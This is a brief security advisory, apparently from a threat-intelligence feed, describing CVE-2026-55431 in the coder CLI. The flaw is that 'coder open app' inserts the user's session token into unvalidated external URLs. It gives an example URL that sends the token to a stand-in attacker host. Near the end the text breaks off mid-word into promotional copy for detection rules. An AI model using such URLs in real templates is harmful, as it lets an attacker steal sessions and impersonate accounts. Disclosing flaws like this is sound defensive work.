Summary coder open app opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the $SESSION_TOKEN placeholder the CLI replaces it with the user's real session token bef…
| CVE ID | CVE-2026-55431 |
| Vendor | go |
| Affected Product | github.com/coder/coder/v2 |
| Vulnerability Type | Vulnerability |
| CVSS Score | 7.7 (HIGH) |
| Actively Exploited | ❌ No known exploitation |
| Patch Status | See Vendor Advisory → |
| Reported By | CYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories) |
#
coder open app opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the $SESSION_TOKEN placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > Note: Practical exploitation requires the victim to run coder open app against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs.https://attacker.example/?t=$SESSION_TOKEN. Running coder open app then sends the user's session token to the attacker and enables full account impersonation for the tSigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.